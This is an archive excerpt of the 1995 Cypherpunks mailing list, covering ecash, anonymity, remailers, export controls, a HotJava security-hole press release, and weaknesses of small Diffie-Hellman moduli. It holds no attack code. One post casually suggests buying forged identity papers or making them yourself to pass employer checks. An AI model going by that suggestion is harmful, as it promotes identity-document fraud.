Date: Mon, 6 Nov 1995 19:12:24 +0800
Subject: ecash remailer
Message-ID: <199511010018.SAA06259@arnet.arn.net>

>Hal writes:
>[suggesting a problem with Ed the Currency Cleaner]
>> What about this, though: Alice did not mean to pay Bob, but rather
>> Charlie, and Bob stole the coins. He launders them through Ed's
>> service. Charlie never got the cash, and Alice complains to the bank
>> that the coins were stolen. The bank says, fine, we can identify the
>> perpetrator, let's see... it's Ed. Ed is now charged with theft and
>> has an expensive and uncertain legal experience ahead of him.
>
>Jumping in hastily:
>
>It seems to me that Ed faces a larger problem if the above scenario turns
>out to be a viable attack. Consider the following sequence: Alice and
>Charlie decide to get some (payee-anonymous) currency laundromat in hot
>water. Alice (payer-anonymously) washes some coins at the laundromat.
>Con-man Charlie claims he didn't get paid for some fictional transaction with
>Alice. Alice complains to the bank, and the rest proceeds as before. The
>Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
>situation from the bank's perspective.
>

Wouldn't the ability to have the bank prove that the coins were 'cashed'
make this all null and void? The only way this would work would be if
Charlie is willing to completely forego cashing in the coins, *ever*.
Should he cash them in later, Ed would seem to have grounds for
suspicion/complaint.

Dave Merriman

This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of
the PGP executable. See below for getting YOUR chunk!
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148

From unicorn at polaris.mindport.net Mon Nov 6 03:35:01 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Mon, 6 Nov 1995 19:35:01 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <199511060208.VAA14123@panix.com>
Message-ID:

On Sun, 5 Nov 1995, Duncan Frissell wrote:

> >> Consider this: most people in the U.S. do not have a "credential" that
> >> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
> >> passports.)
>
> My passport is always close at hand. I love an unchallengeable credential
> that has neither my address nor my SS# on it. I also carry my birth
> certificate which I use for most non-driving interactions. It doesn't have
> much useful info on it. Secured credit cards which can be obtained in any
> name are also handy.

I have often found and come across considerable problems using a
passport, local or foreign, as identification. Many establishments
simply refuse to accept them, as if they are inferior somehow to the
non-standardized frequently forged almighty driver's license.

This is mostly ignorance and a lack of common reference, as few
americans actually HAVE these documents, or have even SEEN them. (No,
I'm not kidding). I found this particularly distressing in D.C.

To some degree it's institutional, where recording a "drivers license
number" on some form becomes problematic for the $5.50 an hour clerk who
can't find the field "driver's license number" anywhere on the passport.
While I just take my business elsewhere when that is possible, I think
it's interesting to note how desperately people cling to the social
security number and completely inept identifications like state issued
licenses as if to let go would mean a descent into the bleeding hell of
anarchy. (In its popularly assumed and feared form)

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From fc at all.net Mon Nov 6 03:58:37 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 19:58:37 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <9511061141.AA16901@all.net>

Anonymous wrote:

> On Sat, 4 Nov 1995 don at cs.byu.edu wrote:
>
> > An anonymous complainer writes:
> >
> > >Well, Perry, my opinion is that there is far too much noise on this list
> > >as it is. I have already seen my words drowned out by bellyaching over
> > >next to nothing.
> >
> > POT-KETTLE-BLACK.
> >
> > Also, since nothing you've written (in your commentary, as opposed to
> > anonymous announcements or releases that most people use anonymity for
> > here) indicates that you're using anonymity for any particular reason,
>
> Hmmm, I'm not sure that anyone has an inherent right to question WHY a
> person seeks moments of anonymity or privacy. I don't believe that
> anyone should be placed on the defensive, for *choosing* to maintain
> some semblance of a personal life, or wishing to maintain some
> illusions that they might still have some shred of personal privacy
> left. Hopefully, we can still leave a man with his dignity.

In the United States, we have the right to express whatever view we
wish, so long as it doesn't endanger others (e.g., incite to riot,
scream "fire" in a crowded theater when there is no fire, etc.).
Everyone has an inherent right to question why a person seeks moments of
anonymity or privacy.

As far as people being placed on the defensive, if you want to be
defensive it's your choice. In terms of understanding what you say,
without understanding the WHY, it's harder to understand and evaluate
the WHAT.

When people use the cover of anonymity to make attempts at character
assassination, the WHY certainly seems a central issue. Is it that the
people who post such attacks are cowards? Do they have ulterior motives?
Or are they simply upset about something else in their life and taking
it out on others. Are they using anonymity to prevent responsibility or
association? Are they afraid of retribution? Without understanding the
motive, their postings cannot be truly understood.

> I should not have to defend my right to present my ideas as I believe
> are appropriate to the circumstances. My choice to present the idea,
> that an entire economic sector needs to carefully reevaluate their
> strategic choices, and their discovered hidden security attitudes -- will
> stand or fall strictly on its merits. The debate is not advanced in any
> way by attaching a reputation to the question.

You don't have to defend anything, but the debate is certainly advanced
by attaching reputation. If you were an investment banker and making
major investment decisions on a daily basis without understanding the
issue, it would bring a very different understanding to our reading than
if you were a high school student. The reason is that content without
context is devoid of meaning. The more context we have, the more meaning
we can attribute to your content.

> Like any other person, I have my skeletons, and I have my regrets. I
> certainly have unfinished, unresolved, issues that I need to tend to. In
> that sense, I am no different than any other man. I also realize that
> ultimately, I'll have to come forward from behind the veil of secrecy
> which is provided to me.

Why wait?
We have a special on truth available only today. Tell us who you are and
we will forgive all past sins (mortal sins not included, void where
prohibited).

> This I will do, after I have reconciled my own security considerations.

Ah - probably void there.

> Please allow me the boundary and dignity to choose when, where, and in
> what form I choose to reveal myself. That inherent right, should be
> extended to any man, and no man should be called to account for his
> desire to maintain his personal privacy, no matter how arbitrary his
> reasons.

Your privacy is yours, but the content of your messages continues to be
degraded by the lack of adequate context for their interpretation.

> Especially when he comes forward to challenge Goliath.

David had only a slingshot. An anonymous remailer would have reduced his
risks too.

...

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From s1113645 at tesla.cc.uottawa.ca Mon Nov 6 05:58:57 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Mon, 6 Nov 1995 21:58:57 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To: <9511061141.AA16901@all.net>
Message-ID:

On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> In the United States, we have the right to express whatever view we
> wish, so long as it doesn't endanger others (e.g., incite to riot,
> scream "fire" in a crowded theater when there is no fire, etc.).
> Everyone has an inherent right to question why a person seeks moments of
> anonymity or privacy.

You're forgetting our good friends the libel laws. Another reason to go anon.
You have the right to say whatever you please, but you'll have to be able
to defend it in court if it damages someone's reputation. It can also get
you fired. (or shot if you're MLK)

This is why it'd be so nice to see more idiot-friendly remailer clients
on windoze, or even better Java (does Private Idaho support Mixmaster yet?).
The average person can really benefit from easy anonymity, otherwise they
won't bother and get in hot water.

Slander is in the eye of the beholder.

From E.J.Koops at kub.nl Mon Nov 6 06:09:47 1995
From: E.J.Koops at kub.nl (Bert-Jaap Koops)
Date: Mon, 6 Nov 1995 22:09:47 +0800
Subject: Crypto Law Survey - updated and online
Message-ID:

I have updated my survey of cryptography regulations worldwide. It is
available at URL
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Please set pointers to this URL rather than copy the file, as I intend
to regularly (i.e., about once every two months) update the survey.

I greatly appreciate comments, corrections, and additional information.

Bert-Jaap Koops
Center for Law and Informatization
Tilburg University
The Netherlands

From s1113645 at tesla.cc.uottawa.ca Mon Nov 6 06:11:20 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Mon, 6 Nov 1995 22:11:20 +0800
Subject: Magic Money
In-Reply-To: <951106025715_99002994@emout06.mail.aol.com>
Message-ID:

On Mon, 6 Nov 1995 EWilhem at aol.com wrote:

> Where do I get the software, Please E-mail me at roger12 at cam.org. I'd like
> the
> evaluation software.
>

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/magic-money

It's freeware as far as I know.

Just curious folks, is anyone still using this? Was there ever any
active playing with it? What's the story? (if there is one)

Ps. Is that the cam in Montreal?

From fc at all.net Mon Nov 6 06:18:46 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 22:18:46 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To:
Message-ID: <9511061335.AA24370@all.net>

s1113645 at tesla.cc.uottawa.ca typed:

> On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:
>
> > In the United States, we have the right to express whatever view we
> > wish, so long as it doesn't endanger others (e.g., incite to riot,
> > scream "fire" in a crowded theater when there is no fire, etc.).
> > Everyone has an inherent right to question why a person seeks moments of
> > anonymity or privacy.
>
> You're forgetting our good friends the libel laws. Another reason to go anon.
> You have the right to say whatever you please, but you'll have to be able
> to defend it in court if it damages someone's reputation. It can also get
> you fired. (or shot if you're MLK)

The anonymity will not protect you very well against libel laws. The
provider will be sued for libel, and unless they reveal your identity,
they will likely lose in court. If they cannot reveal the identity, they
will also likely lose the suit. All the anonymous providers are doing is
giving you anonymity in exchange for their liability. Even international
anonymity systems are not immune to such threats, as we have been shown
by the Church of whatever.

> This is why it'd be so nice to see more idiot-friendly remailer clients
> on windoze, or even better Java (does Private Idaho support Mixmaster yet?).
> The average person can really benefit from easy anonymity, otherwise they
> won't bother and get in hot water.

If it's just a license to slander people, I don't want to support
anonymity. There are valid reasons for remaining anonymous, but being
able to avoid liability for slander is not one of them.

> Slander is in the eye of the beholder.

Slander is in the realm of the courts to decide - at least in the U.S.

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From perry at piermont.com Mon Nov 6 06:24:54 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 22:24:54 +0800
Subject: Keyed-MD5, and HTTP-NG
In-Reply-To: <199511060639.WAA20500@jobe.shell.portal.com>
Message-ID: <199511061357.IAA14010@jekyll.piermont.com>

Someone adopting Detweiler's style writes:

> Hmmm, I guess (as usual) people weren't keeping up with the drafts. It
> really makes some of us outsiders wonder what the IETF actually does in
> its gilded white towers.

Just so that people understand this is a Detweiler troll, and an attempt
by him to start up a flame war/fight.

The IETF is perhaps the single easiest technical standards organization
in the world to participate in. You join the mailing list for any
working group and you are as full a member as you can be. Show up at any
IETF meeting, and you are a full participant. All discussions occur in
the open, are posted on line, most meetings are broadcast worldwide on
the MBONE. All drafts are public, all documents are free.

Detweiler of course knows this, but would like us to argue with him, and
hopefully with each other.

Perry

From s1113645 at tesla.cc.uottawa.ca Mon Nov 6 06:28:41 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Mon, 6 Nov 1995 22:28:41 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID:

On Mon, 6 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> And as the messenger, I (hope) I don't have anything to fear, from the NSA
> or any other foreign group that would seek to pursue its own agenda within
> the borders of sovereign Canada. I really don't think that the NSA is
> "evil incarnate", as some list subscribers do. They have their
> intelligence and know how to use it. Usually, they use it prudently.

They have a nice friend (the author of Spyworld would say outpost) right
here in Ottawa at the Communications Security Establishment. They (CSE)
seem to have done some recent spying on the opposition parties and
Quebec separatists (so I vaguely recall having read in several places. I
haven't gotten around to Spyworld yet).

It was rather funny to see them recruiting on campus. If you're ever in
town, they're just a bit past Carleton U. on Heron.
(it doesn't say CSE on the signs, but the guy at the gate will tell you so)

Try it's a tad sparse, but entertaining all the same. They have very
friendly recruiting brochures. Like NSA, they're also an equal
opportunity employer (;-> ).

From perry at piermont.com Mon Nov 6 06:34:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 22:34:55 +0800
Subject: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <199511061404.JAA14024@jekyll.piermont.com>

anonymous-remailer at shell.portal.com writes:

> Hmmm, I'm not sure that anyone has an inherent right to question WHY a
> person seeks moments of anonymity or privacy.

In your case, Detweiler, it appears to be because you want to cause us
to flame at each other and disrupt the list without our noticing who is
responsible. I'd say that is a questionable motive.

> Please allow me the boundary and dignity to choose when, where, and in
> what form I choose to reveal myself.

You already have.

> P.S. This post is in the public domain.
> C. S. U. M. O. C. L. U. N. E.
>

.pm

From dreschs at mpd.tandem.com Mon Nov 6 06:35:06 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Mon, 6 Nov 1995 22:35:06 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <199511061406.IAA07351@galil.austnsc.tandem.com.>

shields at tembel.org (Michael Shields) said:

MS> If the InterNIC yanked your domain, this would *not* affect your IP
MS> connectivity -- your ability to be reached by any Internet protocol
MS> via IP address. The InterNIC has nothing at all to do with that.

	I never disputed that subverting the DNS system would affect the
ability to use numeric IP addresses, just IP names. But knowing that
there are multiple 'root' DNS servers makes me a bit more comfortable.
But only a little bit - despite my being one of what is generally
referred to as the 'religious right', the pro-censorship tendencies of
the political 'leaders' pandering to it make me very uncomfortable (the
"and when they came to censor me, no one was left to protest" concept
[with apologies to the writer of the original version referring to the
Holocaust]).

--
#include /* Sten Drescher */
To get my PGP public key, send me email with your public key and
Subject: PGP key exchange
Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3

From koontz at MasPar.COM Mon Nov 6 07:53:58 1995
From: koontz at MasPar.COM (David G. Koontz)
Date: Mon, 6 Nov 1995 23:53:58 +0800
Subject: Kallstrom Calls All Calls Tappable
Message-ID: <9511061431.AA15525@argosy.MasPar.COM>

> James Kallstrom, assistant FBI director in charge of the
> New York field division, argues that the proposal would in
> fact reduce the FBI's surveillance authority. "Today ... we
> could tap all the phones in the United States," he said,
> referring to older, pre-digital technology. Under the plan,
> the FBI's surveillance ability would shrink to a maximum of
> 1 percent of simultaneous telephone calls from any one
> telephone switch, he said.

Doublespeak. 2 legs good 4 legs better.

From raph at CS.Berkeley.EDU Mon Nov 6 07:57:18 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 6 Nov 1995 23:57:18 +0800
Subject: List of reliable remailers
Message-ID: <199511061450.GAA24989@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed
information about remailer features and reliability.
To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

For the PGP public keys of the remailers, finger
pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first
part of the listing shows the remailers along with configuration
options and special features for each of the remailers. The second
part shows the 12-day history, and average latency and uptime for each
remailer. You can also get this list by fingering
remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub reord";
$remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = " cpunk pgp hash filter";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = " cpunk pgp hash cut reord mix post";
$remailer{"ford"} = " cpunk pgp hash ksub";
$remailer{"hroller"} = " cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = " cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = " cpunk hash mix";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = " mix cpunk pgp hash latent cut";
$remailer{"precip"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = " cpunk mix";
$remailer{"wmono"} = " cpunk mix pgp. hash latent cut ek";

catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo hroller syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer email address                      history       latency  uptime
-----------------------------------------------------------------------
hacktic  remailer at utopia.hacktic.nl      *********+**     8:54  99.98%
portal   hfinney at shell.portal.com        ###--###**--    46:06  99.98%
ideath   remailer at ideath.goldenbear.com  --.-----_.-- 10:46:11  99.98%
wmono    wmono at valhalla.phoenix.net      ************    12:41  99.97%
ecafe    remail at ecafe.org                *##*#*##*#*#     1:06  99.97%
alumni   hal at alumni.caltech.edu          *+#--***+*--    46:01  99.97%
robo     robo at c2.org                     #--*##.#*#*#    10:10  99.92%
spook    remailer at valhalla.phoenix.net   * *+********    12:11  99.92%
penet    anon at anon.penet.fi              --+++-----+   3:25:44  99.90%
replay   remailer at replay.com             * ******+**      7:06  99.88%
mix      mixmaster at remail.obscura.com    ----------    1:59:30  99.75%
rmadillo remailer at armadillo.com          ++++++++++ +    39:58  99.58%
bsu-cs   nowhere at bsu-cs.bsu.edu          #-+#* *##++     13:47  99.23%
ford     remailer at bi-node.zerberus.de    ________ .   78:53:54  99.04%
syrinx   syrinx at c2.org                   __ .+-+--+++ 15:25:24  98.98%
flame    remailer at flame.alias.net        **+***+ +**     22:20  98.00%
vishnu   mixmaster at vishnu.alias.net      +*******-*+     22:47  97.99%
rahul    homer at rahul.net                 +#*****+-**+     9:18  99.95%
c2       remail at c2.org                   +-- **.* -      46:46  86.40%
extropia remail at extropia.wimsey.com      - -..-       10:09:23  31.33%

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

cpunk
    A major class of remailers. Supports Request-Remailing-To: field.
eric
    A variant of the cpunk style. Uses Anon-Send-To: instead.
penet
    The third class of remailers (at least for right now). Uses
    X-Anon-To: in the header.
pgp
    Remailer supports encryption with PGP. A period after the keyword
    means that the short name, rather than the full email address,
    should be used as the encryption key ID.
hash
    Supports ## pasting, so anything can be put into the headers of
    outgoing messages.
ksub
    Remailer always kills subject header, even in non-pgp mode.
nsub
    Remailer always preserves subject header, even in pgp mode.
latent
    Supports Matt Ghio's Latent-Time: option.
cut
    Supports Matt Ghio's Cutmarks: option.
post
    Post to Usenet using Post-To: or Anon-Post-To: header.
ek
    Encrypt responses in reply blocks using Encrypt-Key: header.
special
    Accepts only pgp encrypted messages.
mix
    Can accept messages in Mixmaster format.
reord
    Attempts to foil traffic analysis by reordering messages. Note:
    I'm relying on the word of the remailer operator here, and haven't
    verified the reord info myself.
mon
    Remailer has been known to monitor contents of private email.
filter
    Remailer has been known to filter messages based on content. If not
    listed in conjunction with mon, then only messages destined for
    public forums are subject to filtering.
Raph Levien

From sameer at c2.org Mon Nov 6 09:00:50 1995
From: sameer at c2.org (sameer)
Date: Tue, 7 Nov 1995 01:00:50 +0800
Subject: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Message-ID: <199511061552.HAA06343@infinity.c2.org>

For Immediate Release
Date: Nov 6th, 1995
Contact: Sameer Parekh 510-601-9777 sameer at c2.org

PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE

Two Princeton University grad students, Dan Wallach and Drew Dean,
recently discovered holes in Sun Microsystems' HotJava web browser. In
response to this finding, Community ConneXion, well known for offering
rewards for exposing holes in internet security products, has decided to
award them with a t-shirt and expand the Community ConneXion Hack line
of promotions to include Java and Java-related products.

Sun's Java product is alleged to allow people browsing the
World-Wide-Web to execute programs on their own computers without
worrying about whether or not the programs were viruses or not. The
holes Wallach and Dean found show that there are a few things in the
HotJava alpha implementation of the Java language which make viruses and
other malicious programs possible within the alpha HotJava web browser.

"We were very impressed with the HotJava concept, so we thought it would
be good to poke around their implementation," said Wallach. "While we
did find some interesting holes, we believe these can be addressed and
Java could make a good standard for remote code on the Web, if an
effective security policy is defined."

Wallach and Dean released their findings initially in the RISKS Digest,
and plan to publish a paper detailing their results. The holes they
found make it possible for a malicious applet to set things up so as to
be able to monitor or modify all of a given web-surfer's activity, after
they ran the malicious applet exploiting the holes. By doing so the
applet may make it possible to violate users' privacy by revealing to a
third party their web traffic.
The holes they found exist only in the alpha release of HotJava. The
beta release, which is the version found in the widely-used Netscape
Navigator 2.0b1J is not vulnerable to these attacks.

"I don't want to be in the t-shirt business," said Sameer Parekh,
President of Community ConneXion, "but we felt that these students' work
deserved a t-shirt. Java has great potential for making the Internet
much more powerful than it already is. It is very important that we
examine Java and make sure that we can trust it."

Community ConneXion, in addition to this Hack Java t-shirt promotion, is
offering t-shirts to people who find holes in Netscape, Microsoft, and
DigiCash. Information about the Hack Java promotion is available from
http://www.c2.org/hackjava/.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and pseudonym servers, in addition to the
standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org/ or from sending email to
info at c2.org.

Java and HotJava are trademarks of Sun Microsystems, Inc. Netscape and
Netscape Navigator are trademarks of Netscape Communications
Corporation. The Hack Java promotion is not affiliated with nor
sponsored by Sun Microsystems.

From lharrison at mhv.net Mon Nov 6 09:02:02 1995
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Tue, 7 Nov 1995 01:02:02 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511061509.AA10512@mhv.net>

At 08:06 AM 11/6/95 -0600, Sten Drescher wrote:
>shields at tembel.org (Michael Shields) said:
>
>MS> If the InterNIC yanked your domain, this would *not* affect your IP
>MS> connectivity -- your ability to be reached by any Internet protocol
>MS> via IP address. The InterNIC has nothing at all to do with that.
>
>	I never disputed that subverting the DNS system would affect the
>ability to use numeric IP addresses, just IP names.
There has been a thought that's been in the back of my mind while
reading this thread. For example, at one time, the telephone companies
used "names" such as Klick 5-1234. Later, they went to all numbers,
i.e., 555-1234. People balked, but they eventually got used to it. There
are other examples not necessary to list here.

If, however, the growth continues with people, not only accessing the
net, but getting domain names - doesn't it seem likely that, at some
point, only IP addresses will be left (or dumb domain names like
http://www.stkdlcp.com)?

Ergo, what is the problem with having a numerical URL? After all, some
people's URL's (in name form) are not the easiest to remember. In the
long run, numbers may be easier to remember. Just think of how many
numbers (Soc. Sec. #'s; phone #'s; tax #'s, etc.) that we have committed
to memory. Plus, one doesn't have to worry about InterNIC yanking your
domain - and other related problems.

Just my .02 cents worth....

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York
lharrison at mhv.net
"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
- Kahlil Gibran from "The Prophet"
********************************************************************

From perry at piermont.com Mon Nov 6 09:11:21 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 7 Nov 1995 01:11:21 +0800
Subject: lp ?
In-Reply-To: <199511061539.HAA04245@hammerhead.com>
Message-ID: <199511061605.LAA14164@jekyll.piermont.com>

Thaddeus J. Beier writes:

> So, if this person was sending cryptographic codes from Switzerland
> to Israel, the code would have been imported to the US, then exported
> by UUNET. They can't do that, can they? Probably nobody would prosecute,
> but it might be something to threaten UUNET with if one of their Northern
> Virginia neighbors ever wanted something they couldn't get otherwise.
It isn't clear that telecoms treaties don't implicitly make this legal in spite of the export regulations. Perry From sameer at c2.org Mon Nov 6 09:18:06 1995 From: sameer at c2.org (sameer) Date: Tue, 7 Nov 1995 01:18:06 +0800 Subject: SSL-encrypted apache web server available for beta-test Message-ID: <199511061607.IAA07644@infinity.c2.org> I put together an SSL/Apache using mostly other people's work, but some of my own. It's available for beta-test to use non-commercial to US-persons. See http://www.c2.org/apachessl/ The README is attached. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org "I don't want to get into the t-shirt business." The release of Apache supports SSL, using Eric Young's SSLeay package and RSADSI's RSAREF cryptography library. Ben Laurie wrote the interfaces to SSL within the Apache server, which was developed by the Apache Group. This release of Apache-SSL is maintained by sameer . For more information on sameer's releases of Apache-SSL see http://www.c2.org/apachessl/. For more information on Apache see http://www.apache.org/ For more information on SSLeay see http://www.psy.uq.oz.au/~ftp/Crypto/ For more information on RSAREF see http://www.rsa.com/ Portions developed at the National Center for Supercomputing Applications at the University of Illinois at Urbana-Champaign. This product includes software developed by Ben Laurie for use in the Apache-SSL HTTP server project. Use of this software is allowed for non-commercial use only, as described in the RSAREF license. For information on commercial use of this software, please see http://www.c2.org/apachessl/. This package is using Apache 0.8.14 -- not the most recent version of Apache. While every effort will be made to keep this package up to date with the most recent Apache version, that can not be guaranteed. 
From frissell at panix.com Mon Nov 6 09:27:27 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 7 Nov 1995 01:27:27 +0800 Subject: using PGP only for digital signatures Message-ID: <199511060208.VAA14123@panix.com> >> Consider this: most people in the U.S. do not have a "credential" that >> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have >> passports.) My passport is always close at hand. I love an unchallengeable credential that has neither my address nor my SS# on it. I also carry my birth certificate which I use for most non-driving interactions. It doesn't have much useful info on it. Secured credit cards which can be obtained in any name are also handy. >A green card, by itself, also fails to prove legal status. Don't "green cards" have pictures now. If they do they should be usable to prove both status and identity. I'm talking about the new "renewable" ones. >Proving legal residency requires a combination of two documents, one each >from specified lists. Most commonly a driver's license, green card (which >is actually pink), or birth certificate from list A, and a social >security card from list B. You need proof of citizenship or residency and proof of identity. Passport and naturalization papers work for both. Otherwise you have to pay the $25 to the guy on the corner for a birth certificate and drivers license. Or DTP it yourself since employers aren't very good at checking papers. Or dodge the whole thing and work for yourself. DCF "Who am us, anyway?" From bal at martigny.ai.mit.edu Mon Nov 6 09:46:44 1995 From: bal at martigny.ai.mit.edu (Brian A. 
LaMacchia) Date: Tue, 7 Nov 1995 01:46:44 +0800 Subject: Photuris Primality verification needed In-Reply-To: <199511051607.LAA08575@jekyll.piermont.com> Message-ID: <9511061646.AA25242@toad.com> X-Authentication-Warning: jekyll.piermont.com: Host localhost didn't use HELO protocol Cc: cypherpunks at toad.com, ipsec-dev at eit.com Reply-To: perry at piermont.com X-Reposting-Policy: redistribute only with permission Date: Sun, 05 Nov 1995 11:07:25 -0500 From: "Perry E. Metzger" Sender: owner-cypherpunks at toad.com Precedence: bulk "William Allen Simpson" writes: > Folks, I was somewhat disappointed in the response to our previous > requests for verification of the strength of the prime moduli. > > Recently, someone asked for a smaller prime of only 512-bits for speed. > This is more than enough for the strength of keys needed for DES, 3DES, > MD5 and SHA. Perhaps this would be easier to have more complete and > robust verification as well. I think that this is a very large mistake. Allow me to explain why. La Macchia (sp?) and Odlyzko (sp?) have a very nice result which shows that once you've done enough precalculation on a particular modulus, you can break any subsequent Diffie-Hellman operation performed on that modulus with (for our purposes) no effort. 512 bits is, from what I can tell, not far out of the realm of possibility for what someone could try to crack with current machines given enough effort. Perry is correct; allow me to add some details. The discrete log problem is "brittle": for a given prime modulus p you have to spend a lot of effort to calculate the first discrete log modulo p, but subsequent discrete logs modulo p are easy to find. Basically, you (a) do a lot of precomputation to compute discrete logs for a set of small(-ish) primes, and then (b) you combine these to find the particular discrete log you're interested in. For the second (and subsequent) discrete logs modulo p you only have to do part (b), which is pretty easy. 
Our practical experiences with discrete logs suggest that the effort required to perform the discrete log precomputations in (a) is slightly more difficult than factoring a composite of the same size in bits. In 1990-91 we estimated that performing (a) for a k-bit prime modulus was about as hard as factoring a k+32-bit composite. [Recent factoring work has probably changed this a bit, but it's still a good estimate.]

Finally, remember that if the modulus in your application is public and fixed (as it usually is) then you've got a very tempting target for me to attack. Once I do the precomputations I can break/subvert/read any particular D-H exchange I want for little additional effort. You have to consider the amount of effort someone might bring to bear against your entire system, not only against a particular transaction. Breaking a particular 512-bit RSA key might not be worth the effort if it just gets me your encrypted e-mail (or whatever), but a 512-bit D-H modulus in a widely deployed system is ripe for attack.

See our paper (available from http://www-swiss.ai.mit.edu/~bal/) for all the juicy details.

--bal

From anonymous-remailer at shell.portal.com Tue Nov 7 01:47:51 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 7 Nov 95 01:47:51 PST
Subject: [noise, personal reply] CBC address.
Message-ID: <199511070946.BAA06926@jobe.shell.portal.com>

A post from Alice, that might be worth reading twice ...

On Sun, 5 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

>
> On Sat, 4 Nov 1995 anonymous-remailer at shell.portal.com wrote:
>
> > Does anyone on this list know if the CBC has a web site on the Net?
> They have a lot of shows in .au (so I hear) or accessible by
